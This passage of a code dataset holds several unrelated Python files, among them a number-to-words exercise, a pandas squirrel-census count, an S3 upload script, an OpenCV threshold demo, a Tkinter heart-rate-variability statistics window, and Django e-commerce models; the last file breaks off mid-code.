+{"seq_id":"36826870131","text":"num = ('zero', 'um', 'dois', 'três', 'quatro', 'cinco', 'seis', 'sete', 'oito', 'nove', 'dez', 'onze', 'doze', 'treze',\n 'quatorze', 'quinze', 'dezesseis', 'dezessete', 'dezoito', 'dezenove', 'vinte')\n\nopc = 0\nwhile True:\n opc = int(input('Digite um número de 0 a 20 : '))\n if 0 <= opc <= 20:\n break\n print('Número Inválido!', end = ' ')\n\nprint(f'Você escolheu o número {num[opc]}!')","repo_name":"CaNeoN28/MyPython","sub_path":"pythonExercicios/tuplas/ex072.py","file_name":"ex072.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"1346547544","text":"import pandas\n\n# def space_del(data):\n# return data[:-1]\n#\n#\n# with open('weather_data.csv', mode=\"r\") as data:\n# initial_data_list = []\n# for x in data.readlines():\n# initial_data_list.append(x)\n#\n# data_header = initial_data_list[0].split(',')\n# data_header[-1] = space_del(data_header[-1])\n# initial_data_list[0] = data_header\n#\n# finished_data_list = []\n# for x in range(1, len(initial_data_list)):\n# seperated_data = initial_data_list[x].split(',')\n# seperated_data[-1] = space_del(seperated_data[-1])\n# individual_obj = {}\n# for y in range(len(initial_data_list[0])):\n# individual_obj[data_header[y]] = seperated_data[y]\n# finished_data_list.append(individual_obj)\n# print(finished_data_list)\n\n# import csv\n#\n# with open('weather_data.csv', mode=\"r\") as data_file:\n# data = csv.reader(data_file)\n# lista = []\n# for row in data:\n# if row[1] != 'temp':\n# lista.append(int(row[1]))\n# print(lista)\n\n# data = pandas.read_csv('weather_data.csv')\n# print(data[data.temp == data.temp.max()])\n# list_temp = data['temp'].to_list()\n# sum_of_temps = 0\n#\n# for x in list_temp:\n# sum_of_temps += x\n#\n# print(round(sum_of_temps/len(list_temp), 2))\n\n# print(data[data.day == 'Monday'].temp*(9/5)+32)\n\n# data_dict = {\n# 'students': ['Student1', 'Student2', 'Student3'],\n# 'scores': [8, 6, 2]\n# }\n#\n# data = pandas.DataFrame(data_dict)\n# data.to_csv('students_dict.csv')\n\ndata = pandas.read_csv('2018_Central_Park_Squirrel_Census_-_Squirrel_Data.csv')\ndata_gray = data[data['Primary Fur Color'] == 'Gray']\ndata_black = data[data['Primary Fur Color'] == 'Black']\ndata_cinnamon = data[data['Primary Fur Color'] == 'Cinnamon']\n\nlist_data_colors = {'Fur Color': ['grey', 'black', 'red'], 'Count': [len(data_gray), len(data_black),\n len(data_cinnamon)]}\n\ndata_conversion = pandas.DataFrame(list_data_colors)\nprint(data_conversion)\ndata_conversion.to_csv('squirrels_color.csv')\n","repo_name":"BinayT/Python100DOC","sub_path":"Day-25-Pandas-Library/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"69906329378","text":"import boto3\nfrom botocore.exceptions import ClientError\n\ns3 = boto3.client('s3')\n\n\ndef upload_file(input_name, bucket_name, output_name):\n with open(input_name, 'rb') as file:\n try:\n s3.upload_fileobj(file, bucket_name, output_name)\n except ClientError as e:\n print(e)\n return\n print('file has been uploaded')\n\n\nif __name__ == '__main__':\n upload_file(\"./src/IMG_1002.JPG\", 'btu-devops-nk-2023', 
'IMG_1003.JPG')\n","repo_name":"freexnick/aws","sub_path":"assignment-03/s3_upload_file.py","file_name":"s3_upload_file.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"37461809663","text":"import numpy as np\nimport cv2\nimg_dir = './testdata/1.jpg'\n\ndef onChange(pos): # 트랙바 핸들러\n global img\n # 트랙바의 값 받아오기\n # 트랙바 이름, 윈도우 창 이름\n thresh = cv2.getTrackbarPos('threshold', 'Trackbar Windows')\n maxval = cv2.getTrackbarPos(\"maxValue\", \"Trackbar Windows\")\n _, binary = cv2.threshold(src, thresh, maxval, cv2.THRESH_BINARY)\n\n cv2.imshow('Trackbar Windows', binary)\n\n\nsrc = cv2.imread(img_dir, cv2.IMREAD_GRAYSCALE)\n# cv2.imshow('img', img) # GUI(윈도우)창 생성, 이미지 보여주기\n\n# 트랙바 생성\n# 트랙바 이름, 윈도우 창 이름, 최소값, 최대값, 콜백 함수\ncv2.namedWindow(\"Trackbar Windows\", flags=cv2.WINDOW_KEEPRATIO )\n\ncv2.createTrackbar(\"threshold\", \"Trackbar Windows\", 0, 255, onChange)\ncv2.createTrackbar(\"maxValue\", \"Trackbar Windows\", 0, 255, lambda x : x)\n\ncv2.setTrackbarPos(\"threshold\", \"Trackbar Windows\", 127)\ncv2.setTrackbarPos(\"maxValue\", \"Trackbar Windows\", 255)\n\n\ncv2.waitKey()\ncv2.destroyAllWindows()\n","repo_name":"ChaeChae0505/Using","sub_path":"ComputerVision/thresholdbar.py","file_name":"thresholdbar.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"3655621979","text":"# ~~~~~~~~~~~~~~ HRV ~~~~~~~~~~~~~~~~~~~ #\nimport tkinter.constants as TKc\nfrom tkinter import Frame, FALSE, messagebox, Label, StringVar, OptionMenu, Entry, Button, Toplevel\nfrom utils.Graphical_Functions import *\nfrom utils.Style_Functions import headerStyles\nfrom utils.writers.export import Exporter\nfrom utils.viewers import PlotViewer\n\n\nclass HRVstatics(Frame):\n \"\"\"\n Calculating HRV Statistics\n \"\"\"\n def __init__(self, parent, data_dict, preferences):\n Frame.__init__(self, parent)\n self.exp = Exporter(preferences=preferences)\n self.prec = None\n self.frqmeth = None\n self.Outer_freq_dat = None\n self.Rpeak_input = None\n self.DA_dat = None\n self.Outer_DA_dat = None\n self.freq_dat_low = None\n self.parent = parent\n self.pref = preferences\n self.data_dict = data_dict\n self.acc_lbls = ['Sensitivity (%)', 'Positive Predictability (%)', 'Accuracy (%)', 'Detection Error Rate (%)']\n self.poincare_lbls = ['SD1 (ms)', 'SD2 (ms)']\n self.tf_lbls = ['SDNN', 'SDANN', 'MeanRR', 'RMSSD', 'pNN50']\n self.dfa_lbls = []\n self.rqa_lbls = ['DET (%)', 'REC (%)', 'LAM (%)', 'Lmean (bts)', 'Lmax (%)', 'Vmean (bts)', ' Lmax (%)']\n self.text, self.subheader, self.subheadernb, self.header = headerStyles(self.pref['values']['font'],\n self.pref['values']['base_font_size'])\n self.plot_wind = None\n self.parent.title(\"Algorithm and HRV Metrics\")\n self.parent.resizable(width=FALSE, height=FALSE)\n self.parent.configure(highlightthickness=1, highlightbackground='grey')\n self.stats()\n\n @staticmethod\n def __remove_doubles(x, y=None):\n\n x = x.reshape(-1, )\n temp = np.append(np.diff(x), 1)\n x = x[temp != 0]\n\n if y is None:\n return x.reshape(-1, 1)\n else:\n y = y.reshape(-1, )\n y = y[temp != 0]\n return x.reshape(-1, 1), y.reshape(-1, 1)\n\n def stats(self):\n but_wtd = 20\n Fs = self.data_dict['Fs']\n\n if len(self.data_dict['R_t']) <= 1 & self.pref['values']['warnings_on']:\n messagebox.showwarning(\"Warning\", \"Cannot calculate HRV metrics \\n\\nPlease note: Annotations must be \"\n \"present 
for HRV metrics to be calculated.\")\n else:\n if self.pref['values']['ECG_pref_on']:\n # Removes any accidental double-ups created during editing and sets metrics to be calculated based\n # on which plot is present\n if self.data_dict['plot_pred'] == 1:\n R_t, tR_amp = self.__remove_doubles(self.data_dict['R_t'], self.data_dict['R_amp'])\n Rpeakss = R_t\n else:\n tR_t, tR_amp = self.__remove_doubles(self.data_dict['True_R_t'], self.data_dict['True_R_amp'])\n Rpeakss = tR_amp\n # WORK OUT HOW TO DRAW LATER\n # draw1()\n\n else:\n R_t = self.__remove_doubles(self.data_dict['R_t'])\n Rpeakss = R_t\n\n # Frame Parameters\n data_frame = Frame(master=self.parent)\n data_frame.pack()\n time_dat = Frame(master=data_frame)\n time_dat.pack(side='left', anchor='n')\n self.Outer_freq_dat = Frame(master=data_frame)\n self.Outer_freq_dat.pack(side='left', anchor='n')\n freq_dat_up = Frame(self.Outer_freq_dat)\n freq_dat_up.pack(side='top')\n self.freq_dat_low = Frame(self.Outer_freq_dat)\n self.freq_dat_low.pack(side='top')\n non_dat = Frame(master=data_frame)\n non_dat.pack(side='left', anchor='n')\n self.Outer_DA_dat = Frame(master=data_frame)\n self.Outer_DA_dat.pack(side='left', anchor='n')\n self.DA_dat = Frame(master=self.Outer_DA_dat)\n self.DA_dat.pack(side='top', anchor='n')\n\n # TIME-DOMAIN Parameters\n time_domain = Calculate_Features(Rpeakss, Fs)\n Label(time_dat, text=\"Time-Domain Parameters\", anchor=TKc.W, font=self.text).grid(row=0, column=0,\n columnspan=2)\n\n for i, dat in enumerate(time_domain):\n self.__add_paired_label(time_dat, self.tf_lbls[i], dat, row=i+1)\n\n Label(time_dat, text=\"\", anchor=TKc.W, width=int(but_wtd / 4)).grid(row=5, column=2) # SPACER\n\n # FREQUENCY-DOMAIN Parameters\n Label(freq_dat_up, text=\"Frequency-Domain Parameters\", anchor=TKc.W, font=self.text).pack(side='top',\n anchor='center')\n\n # Frequency-domain Statistics\n self.Rpeak_input = Rpeakss / Fs\n\n # MENU FOR CHOICE OF ANALYSIS title_list =\n self.frqmeth = StringVar(freq_dat_up)\n options = ['Welch', 'Blackman-Tukey', 'LombScargle', 'Auto Regression']\n RRImenu = OptionMenu(freq_dat_up, self.frqmeth, options[0], *options)\n RRImenu.config(width=16)\n # RRImenu.configure(compound='right',image=self.photo)\n RRImenu.pack(side='top')\n\n self.frqmeth.trace('w', self.change_dropdown_HRV)\n self.__print_freq(but_wtd, method=1)\n\n # NON-LINEAR Parameters\n RRI = np.diff(self.Rpeak_input)\n rqa_ = RQA(RRI)\n pc_ = Poincare(RRI)\n dfa_ = DFA(RRI)\n self.__print_non_linear(non_dat, rqa_, pc_, dfa_, but_wtd)\n\n if self.pref['values']['loaded_ann'] == 1:\n self.prec = None\n try:\n tR_t, tR_amp = self.__remove_doubles(self.data_dict['True_R_t'], self.data_dict['True_R_amp'])\n self.__print_acc(tR_t, tR_amp, but_wtd)\n except KeyError:\n raise Warning('Can\\'t access true peaks. 
Check true R locations are loaded')\n\n else:\n tR_t = None\n\n Button(self.parent, text=\"Save\", width=int(but_wtd / 2), height=2,\n command=self.exp.savemetrics(Rpeakss, Fs, tR_t, td=time_domain, rqa=rqa_, dfa=dfa_, pc=pc_),\n font='Helvetica 12 bold').pack(side='bottom', anchor='e')\n\n self.__open_plot()\n\n # NONLINEAR Parameters\n def __print_non_linear(self, df, rqa, pc, dfa, bw, fnt='Helvetica 10 bold'):\n \"\"\"\n\n :param df: Dataframe.\n :param rqa: RQA parameters\n :param pc: Poincare parameters\n :param dfa: DFA parameters\n :param bw: Button Width\n :param fnt: Font for subtitles\n :return:\n \"\"\"\n Label(df, text=\"Nonlinear Parameters\", anchor=TKc.W, font=self.text).grid(row=0, column=0, columnspan=4)\n\n Label(df, text=\"Recurrence Analysis\", anchor=TKc.W, width=bw, font=fnt).grid(row=1, column=0, columnspan=2)\n for i, dat in enumerate(rqa):\n self.__add_paired_label(df, self.rqa_lbls[i], dat, row=i + 2, col=0)\n\n Label(df, text=\"Poincare Analysis\", anchor=TKc.W, width=bw, font=fnt).grid(row=1, column=2, columnspan=2)\n for i, dat in enumerate(pc):\n self.__add_paired_label(df, self.poincare_lbls[i], dat, row=i + 2, col=2)\n\n Label(df, text=\"DFA\", anchor=TKc.W, width=bw, font=fnt).grid(row=5, column=2, columnspan=2)\n for i, dat in enumerate(dfa[:2]):\n self.__add_paired_label(df, self.dfa_lbls[i], dat, row=i + 6, col=2)\n\n def __print_acc(self, pks, true_pks, bw, tt: int = None):\n if tt is None:\n tt = self.pref['values']['tt']\n\n TP, FP, FN = test2(pks, true_pks, tt)\n Se, PP, ACC, DER = acc2(TP, FP, FN)\n\n Label(self.DA_dat, text=\"Detection Algorithm Metrics\", anchor=TKc.W, font=self.text).grid(row=3, column=13,\n columnspan=4)\n for i, dat in enumerate([Se, PP, ACC, DER]):\n self.__add_paired_label(self.DA_dat, self.acc_lbls[i], dat, row=i+4, col=13)\n\n Label(self.DA_dat, text=\"Precision Window (ms)\", anchor=TKc.W).grid(row=8, column=13)\n self.prec = Entry(self.DA_dat, width=int(bw / 2))\n self.prec.grid(row=8, column=14)\n time = self.data_dict['Fs'] / self.data_dict['Fs'] * 1000\n self.prec.insert(0, '{:.2f}'.format(time))\n Button(self.DA_dat, text=\"Update\", anchor=TKc.W, width=int(bw / 2),\n command=lambda: self.updateprec(pks, true_pks, bw)).grid(row=8, column=15)\n\n def updateprec(self, pks, true_pks, but_wtd):\n self.DA_dat.destroy()\n self.DA_dat = Frame(master=self.Outer_DA_dat)\n self.DA_dat.pack(side='top')\n self.__print_acc(pks, true_pks, but_wtd, round(float(self.prec.get()) * self.data_dict['Fs'] / 1000))\n\n def change_dropdown_HRV(self, *args):\n methods = self.frqmeth.get()\n\n if methods == 'Welch':\n METH = 1\n elif methods == 'Blackman-Tukey':\n METH = 2\n elif methods == 'LombScargle':\n METH = 3\n else:\n METH = 4\n\n self.__print_freq(but_wtd=20, method=METH)\n\n def __print_freq(self, but_wtd, method):\n self.freq_dat_low.destroy()\n self.freq_dat_low = Frame(master=self.Outer_freq_dat)\n self.freq_dat_low.pack(side='top')\n\n def _gen_label(txt, w, r_, c_):\n Label(self.freq_dat_low, text=txt, anchor=TKc.W, width=w).grid(row=r_, column=c_)\n\n fq_vals = Freq_Analysis(self.Rpeak_input, meth=method, decim=3, m=self.pref['values']['welch_L'],\n o=self.pref['values']['welch_O'], bt_val=self.pref['values']['bltk_input'],\n omega_max=self.pref['values']['ls_omega_max'], order=self.pref['values']['ar_order'])\n\n txt__ = ['VLF (Hz)', str(fq_vals[6]), 'LF (Hz)', fq_vals[7], 'HF (Hz)', fq_vals[8]]\n w1, w2 = int(but_wtd / 4 * 3), int(but_wtd / 2)\n\n _gen_label(txt='Peak Frequency', w=w1, r_=1, c_=0)\n c, r = 1, 1\n for i in 
[0, 2, 4]:\n for j in range(2):\n _gen_label(txt=txt__[i+j], w=w2, r_=r+j, c_=c)\n c += 1\n\n txt__ = ['VLF (%)', str(fq_vals[3]), 'LF (%)', fq_vals[4], 'HF (%)', fq_vals[5]]\n _gen_label(txt='Percentage Power', w=w1, r_=3, c_=0)\n c, r = 1, 3\n for i in [0, 2, 4]:\n for j in range(2):\n _gen_label(txt=txt__[i+j], w=w2, r_=r+j, c_=c)\n c += 1\n\n txt__ = ['VLF (ms^2)', str(fq_vals[0]), 'LF (ms^2)', fq_vals[1], 'HF (ms^2)', fq_vals[2]]\n _gen_label(txt='Absolute Power', w=w1, r_=5, c_=0)\n c, r = 1, 5\n for i in [0, 2, 4]:\n for j in range(2):\n _gen_label(txt=txt__[i+j], w=w2, r_=r+j, c_=c)\n c += 1\n\n Label(self.freq_dat_low, text=\"Peak Frequency\", anchor=TKc.W, width=w1).grid(row=1, column=0)\n\n def __open_plot(self):\n # Change data from none\n dat = None\n\n if self.plot_wind is not None:\n self.plot_wind.destroy()\n self.plot_wind = Toplevel()\n self.pv = PlotViewer(self.plot_wind, dat, self.pref)\n self.plot_wind.bind('', self.__close_plot_viewer)\n\n def __close_plot_viewer(self):\n # TODO - check if this works\n self.pv.close()\n\n def __add_paired_label(self, dframe, txt, value, row, col: int = 0, bw: int = 20):\n \"\"\"\n\n :param dframe:\n :param txt:\n :param value:\n :param row:\n :param col:\n :param bw:\n :return:\n \"\"\"\n Label(dframe, text=txt, anchor=TKc.W, width=bw, font=self.text).grid(row=row, column=col)\n Label(dframe, text=value, anchor=TKc.W, width=int(bw / 2), font=self.text).grid(row=row, column=col + 1)\n","repo_name":"drmegmcconnell/RRAPET","sub_path":"utils/HRV_Statistics.py","file_name":"HRV_Statistics.py","file_ext":"py","file_size_in_byte":12022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"36921977728","text":"import re\nimport pytz\n\nfrom mptt.models import MPTTModel, TreeForeignKey\nfrom mptt.querysets import TreeQuerySet\nfrom mptt.managers import TreeManager\n\nfrom decimal import Decimal\nfrom datetime import datetime\nfrom cms.models import CMSPlugin\nfrom colorfield.fields import ColorField\nfrom polymorphic.query import PolymorphicQuerySet\n\nfrom cms.models import Page\n\nfrom filer.fields import image\nfrom filer.fields.file import FilerFileField\n\nfrom parler.fields import TranslatedField\nfrom parler.managers import TranslatableManager, TranslatableQuerySet\nfrom parler.models import TranslatableModel, TranslatableModelMixin\nfrom parler.models import TranslatedFieldsModel, TranslatedFields\n\nfrom django.db import models\nfrom django.db.models import Q\nfrom django.contrib import sites\nfrom django.core.validators import MinValueValidator\nfrom djangocms_text_ckeditor.fields import HTMLField\nfrom django.utils.six.moves.urllib.parse import urljoin\nfrom django.utils.translation import ugettext_lazy as _\nfrom autoslug import AutoSlugField\n\nfrom shop.money import Money, MoneyMaker\nfrom shop.money.fields import MoneyField\nfrom shop.models.address import BaseShippingAddress, BaseBillingAddress\nfrom shop.models.customer import CustomerModel\nfrom shop.models.defaults.cart import Cart\nfrom shop.models.defaults.cart_item import CartItem\nfrom shop.models.defaults.customer import Customer\nfrom shop.models.defaults.mapping import ProductPage, ProductImage\nfrom shop.models.defaults.order import Order\nfrom shop.models.fields import JSONField\nfrom shop.models.order import BaseOrderItem\nfrom shop.models.product import BaseProduct, BaseProductManager\nfrom shop.models.product import AvailableProductMixin\n\nfrom .utils import get_apply_discountpercategory\nfrom 
shop.models.delivery import BaseDelivery, BaseDeliveryItem\n\n\ntry:\n from apps.dmRabais.models import dmRabaisPerCategory\n from apps.dmRabais.models import dmPromoCode\n from apps.dmRabais.models import dmCustomerPromoCode\nexcept Exception as e:\n print(e)\n dmRabaisPerCategory = None\n dmPromoCode = None\n dmCustomerPromoCode = None\n\n__all__ = [\"Cart\", \"CartItem\", \"Order\", \"Customer\"]\n\nTAG_RE = re.compile(r\"<[^>]+>\")\n\n\nclass Delivery(BaseDelivery):\n class Meta:\n get_latest_by = [\"pk\"]\n\n\nclass DeliveryItem(BaseDeliveryItem):\n quantity = models.PositiveIntegerField(\n _(\"Ordered Quantity\")\n )\n\n class Meta:\n get_latest_by = [\"pk\"]\n\n\nclass OrderItem(BaseOrderItem):\n quantity = models.PositiveIntegerField(\n _(\"Ordered Quantity\")\n )\n variables = JSONField(\n verbose_name=_(\"Data\")\n )\n\n canceled = models.BooleanField(\n verbose_name=_(\"Canceled\"),\n default=False\n )\n\n def populate_from_cart_item(self, cart_item, request):\n super().populate_from_cart_item(cart_item, request)\n self.variables = cart_item.extra\n self.save()\n\n\nclass CMSPageReferenceMixin(object):\n category_fields = [\"cms_pages\"]\n\n def get_absolute_url(self):\n page = Page.objects.filter(reverse_id=\"produits\").first()\n if page is not None:\n return page.get_absolute_url()\n return \"\"\n\n\nclass ProductQuerySet(TranslatableQuerySet, PolymorphicQuerySet):\n pass\n\n\nclass ProductManager(BaseProductManager, TranslatableManager):\n queryset_class = ProductQuerySet\n\n def get_queryset(self):\n qs = self.queryset_class(self.model, using=self._db)\n return qs.prefetch_related(\"translations\")\n\n\n#######################################################################\n# Adresses\n#######################################################################\n\nCOUNTRIES_FR = [\n ('AF', _('Afghanistan')), ('ZA', _('Afrique du Sud')),\n ('AL', _('Albanie')), ('DZ', _('Algérie')),\n ('DE', _('Allemagne')), ('AD', _('Andorre')),\n ('AO', _('Angola')), ('AG', _('Antigua-et-Barbuda')),\n ('SA', _('Arabie saoudite')), ('AR', _('Argentine')),\n ('AM', _('Arménie')), ('AU', _('Australie')),\n ('AT', _('Autriche')), ('AZ', _('Azerbaïdjan')),\n ('BS', _('Bahamas')), ('BH', _('Bahreïn')),\n ('BD', _('Bangladesh')), ('BB', _('Barbade')),\n ('BY', _('Biélorussie')), ('BE', _('Belgique')),\n ('BZ', _('Belize')), ('BJ', _('Bénin')), ('BT', _('Bhoutan')),\n ('BO', _('Bolivie')), ('BA', _('Bosnie-Herzégovine')),\n ('BW', _('Botswana')), ('BR', _('Brésil')),\n ('BN', _('Brunei')), ('BG', _('Bulgarie')),\n ('BF', _('Burkina Faso')), ('BI', _('Burundi')),\n ('KH', _('Cambodge')), ('CM', _('Cameroun')),\n ('CA', _('Canada')), ('CV', _('Cap-Vert')),\n ('CF', _('République centrafricaine')), ('CL', _('Chili')),\n ('CN', _('Chine')), ('CY', _('Chypre (pays)')),\n ('CO', _('Colombie')), ('KM', _('Comores (pays)')),\n ('CG', _('République du Congo')),\n ('CD', _('République démocratique du Congo')),\n ('KR', _('Corée du Sud')), ('KP', _('Corée du Nord')),\n ('CR', _('Costa Rica')), ('CI', _(\"Côte d'Ivoire\")),\n ('HR', _('Croatie')), ('CU', _('Cuba')), ('DK', _('Danemark')),\n ('DJ', _('Djibouti')), ('DO', _('République dominicaine')),\n ('DM', _('Dominique')), ('EG', _('Égypte')),\n ('SV', _('Salvador')), ('AE', _('Émirats arabes unis')),\n ('EC', _('Équateur (pays)')), ('ER', _('Érythrée')),\n ('ES', _('Espagne')), ('EE', _('Estonie')),\n ('US', _('États-Unis')), ('ET', _('Éthiopie')),\n ('FJ', _('Fidji')), ('FI', _('Finlande')), ('FR', _('France')),\n ('GA', _('Gabon')), ('GM', _('Gambie')),\n 
('GE', _('Géorgie (pays)')), ('GH', _('Ghana')),\n ('GR', _('Grèce')), ('GD', _('Grenade (pays)')),\n ('GT', _('Guatemala')), ('GN', _('Guinée')),\n ('GW', _('Guinée-Bissau')), ('GQ', _('Guinée équatoriale')),\n ('GY', _('Guyana')), ('HT', _('Haïti')), ('HN', _('Honduras')),\n ('HU', _('Hongrie')),\n ('IN', _('Inde')), ('ID', _('Indonésie')), ('IR', _('Iran')),\n ('IQ', _('Irak')), ('IE', _('Irlande (pays)')),\n ('IS', _('Islande')), ('IL', _('Israël')), ('IT', _('Italie')),\n ('JM', _('Jamaïque')),\n ('JP', _('Japon')), ('JO', _('Jordanie')),\n ('KZ', _('Kazakhstan')), ('KE', _('Kenya')),\n ('KG', _('Kirghizistan')), ('KI', _('Kiribati')),\n ('KW', _('Koweït')), ('LA', _('Laos')), ('LS', _('Lesotho')),\n ('LV', _('Lettonie')), ('LB', _('Liban')),\n ('LR', _('Liberia')), ('LY', _('Libye')),\n ('LI', _('Liechtenstein')), ('LT', _('Lituanie')),\n ('LU', _('Luxembourg (pays)')), ('MK', _('Macédoine du Nord')),\n ('MG', _('Madagascar')), ('MY', _('Malaisie')),\n ('MW', _('Malawi')), ('MV', _('Maldives')), ('ML', _('Mali')),\n ('MT', _('Malte')), ('MA', _('Maroc')),\n ('MH', _('Îles Marshall (pays)')), ('MU', _('Maurice (pays)')),\n ('MR', _('Mauritanie')), ('MX', _('Mexique')),\n ('FM', _('États fédérés de Micronésie (pays)')),\n ('MD', _('Moldavie')), ('MC', _('Monaco')),\n ('MN', _('Mongolie')), ('ME', _('Monténégro')),\n ('MZ', _('Mozambique')), ('MM', _('Birmanie')),\n ('NA', _('Namibie')), ('NR', _('Nauru')), ('NP', _('Népal')),\n ('NI', _('Nicaragua')), ('NE', _('Niger')), ('NG', _('Nigeria')),\n ('NO', _('Norvège')), ('NZ', _('Nouvelle-Zélande')),\n ('OM', _('Oman')), ('UG', _('Ouganda')),\n ('UZ', _('Ouzbékistan')), ('PK', _('Pakistan')),\n ('PW', _('Palaos')), ('PA', _('Panama')),\n ('PG', _('Papouasie-Nouvelle-Guinée')), ('PY', _('Paraguay')),\n ('NL', _('Pays-Bas')), ('PE', _('Pérou')),\n ('PH', _('Philippines')), ('PL', _('Pologne')),\n ('PT', _('Portugal')), ('QA', _('Qatar')), ('RO', _('Roumanie')),\n ('GB', _('Royaume-Uni')), ('RU', _('Russie')),\n ('RW', _('Rwanda')), ('KN', _('Saint-Christophe-et-Niévès')),\n ('SM', _('Saint-Marin')),\n ('VC', _('Saint-Vincent-et-les-Grenadines')),\n ('LC', _('Sainte-Lucie')), ('SB', _('Salomon')),\n ('WS', _('Samoa')), ('ST', _('Sao Tomé-et-Principe')),\n ('SN', _('Sénégal')), ('RS', _('Serbie')),\n ('SC', _('Seychelles')), ('SL', _('Sierra Leone')),\n ('SG', _('Singapour')), ('SK', _('Slovaquie')),\n ('SI', _('Slovénie')), ('SO', _('Somalie')), ('SD', _('Soudan')),\n ('SS', _('Soudan du Sud')), ('LK', _('Sri Lanka')),\n ('SE', _('Suède')), ('CH', _('Suisse')), ('SR', _('Suriname')),\n ('SZ', _('Eswatini')), ('SY', _('Syrie')),\n ('TJ', _('Tadjikistan')), ('TZ', _('Tanzanie')),\n ('TD', _('Tchad')), ('CZ', _('Tchéquie')),\n ('TH', _('Thaïlande')), ('TL', _('Timor oriental')),\n ('TG', _('Togo')), ('TO', _('Tonga')),\n ('TT', _('Trinité-et-Tobago')), ('TN', _('Tunisie')),\n ('TM', _('Turkménistan')), ('TR', _('Turquie')),\n ('TV', _('Tuvalu')), ('UA', _('Ukraine')), ('UY', _('Uruguay')),\n ('VU', _('Vanuatu')), ('VE', _('Venezuela')),\n ('VN', _('Viêt Nam')), ('YE', _('Yémen')), ('ZM', _('Zambie')),\n ('ZW', _('Zimbabwe'))\n]\n\n\nclass ShippingAddress(BaseShippingAddress):\n \"\"\"\n Customer's shipping address.\n \"\"\"\n\n name = models.CharField(\n _(\"Fullname\"),\n max_length=1024\n )\n address1 = models.CharField(\n _(\"Address 1\"),\n max_length=1024\n )\n address2 = models.CharField(\n _(\"Address 2\"),\n max_length=1024,\n blank=True,\n null=True\n )\n country = models.CharField(\n _(\"Country\"),\n max_length=4\n )\n province = 
models.CharField(\n _(\"Province / State\"),\n max_length=1024\n )\n city = models.CharField(\n _(\"City\"),\n max_length=1024\n )\n zip_code = models.CharField(\n _(\"Postal Code\"),\n max_length=255\n )\n\n class Meta:\n verbose_name = _(\"Shipping Address\")\n verbose_name_plural = _(\"Shipping Addresses\")\n\n def get_country_display(self):\n result = self.country\n for item in COUNTRIES_FR:\n if self.country in item[0]:\n result = item[1]\n return result\n\n\nclass BillingAddress(BaseBillingAddress):\n \"\"\"\n Customer's billing address.\n \"\"\"\n\n name = models.CharField(\n _(\"Fullname\"),\n max_length=1024\n )\n address1 = models.CharField(\n _(\"Address 1\"),\n max_length=1024\n )\n address2 = models.CharField(\n _(\"Address 2\"),\n max_length=1024,\n blank=True,\n null=True\n )\n country = models.CharField(\n _(\"Country\"),\n max_length=4\n )\n province = models.CharField(\n _(\"Province / State\"),\n max_length=1024\n )\n city = models.CharField(\n _(\"City\"),\n max_length=1024\n )\n zip_code = models.CharField(\n _(\"Postal Code\"),\n max_length=255\n )\n\n class Meta:\n verbose_name = _(\"Billing Address\")\n verbose_name_plural = _(\"Billing Addresses\")\n\n def get_country_display(self):\n result = self.country\n for item in COUNTRIES_FR:\n if self.country in item[0]:\n result = item[1]\n return result\n\n\n#######################################################################\n# Produit: Catégorie/Filtres\n#######################################################################\n\n# To user MPTT and Parler, need to overwrite Queryset\nclass CategoryQuerySet(TranslatableQuerySet, TreeQuerySet):\n\n def as_manager(cls):\n manager = CategoryManager.from_queryset(cls)()\n manager._built_with_as_manager = True\n return manager\n as_manager.queryset_only = True\n as_manager = classmethod(as_manager)\n\n\n# Need to create own CategoryManager\nclass CategoryManager(TreeManager, TranslatableManager):\n _queryset_class = CategoryQuerySet\n\n\nclass ProductCategory(CMSPageReferenceMixin, MPTTModel, TranslatableModel):\n \"\"\"\n A model to help to categorize products.\n Product can have multiple categories.\n \"\"\"\n\n CHOIX_POS = [\n (1, _(\"Left\")),\n (2, _(\"Center\")),\n (3, _(\"Right\"))\n ]\n\n name = models.CharField(\n verbose_name=_(\"Category's Name\"),\n max_length=255,\n null=False,\n blank=False,\n help_text=_(\"Maximum 255 characters.\")\n )\n name_trans = TranslatedField()\n parent = TreeForeignKey(\n \"self\",\n on_delete=models.CASCADE,\n verbose_name=_(\"Parent's Category\"),\n related_name='children',\n blank=True,\n null=True\n )\n square_id = models.CharField(\n verbose_name=_(\"Square ID\"),\n max_length=30,\n null=True,\n blank=True\n )\n order = models.PositiveSmallIntegerField(\n verbose_name=_(\"Sort by\"),\n default=0,\n blank=False,\n null=False\n )\n text = HTMLField(\n verbose_name=_(\"Text\"),\n configuration=\"CKEDITOR_SETTINGS_DMPLUGIN\",\n null=True,\n blank=True,\n help_text=_(\n \"A text that will be shown on the top of \\\n the page of the Products of this category.\"\n )\n )\n text_position = models.PositiveSmallIntegerField(\n verbose_name=_(\"Position\"),\n choices=CHOIX_POS,\n default=1,\n help_text=_(\"Position of the text.\")\n )\n text_color = ColorField(\n verbose_name=_(\"Text's Colour\"),\n null=True,\n blank=True\n )\n bg_color = ColorField(\n verbose_name=_(\"Background's Colour\"),\n null=True,\n blank=True\n )\n image = image.FilerImageField(\n verbose_name=_(\"Header's Image\"),\n on_delete=models.SET_NULL,\n 
related_name=\"category_image\",\n null=True,\n blank=True,\n help_text=_(\n \"Size: 2000x900.\\\n An image that will be shown on the top of the page of\\\n the Products of this category.\"\n )\n )\n\n active = models.BooleanField(\n verbose_name=_(\"Active\"),\n default=True\n )\n\n objects = CategoryManager()\n\n class Meta:\n verbose_name = _(\"Product's Category\")\n verbose_name_plural = _(\"Product's Categories\")\n\n class MPTTMeta:\n level_attr = 'mptt_level'\n order_insertion_by = ['name']\n\n def __str__(self):\n if self.parent is not None:\n if self.parent.parent is not None:\n return self.parent.parent.name + \" | \" + \\\n self.parent.name + \" | \" + self.name\n else:\n return self.parent.name + \" | \" + self.name\n else:\n return self.name\n\n def get_products(self):\n result = Product.objects.filter(\n Q(categories=self) | Q(categories__parent=self)\n | 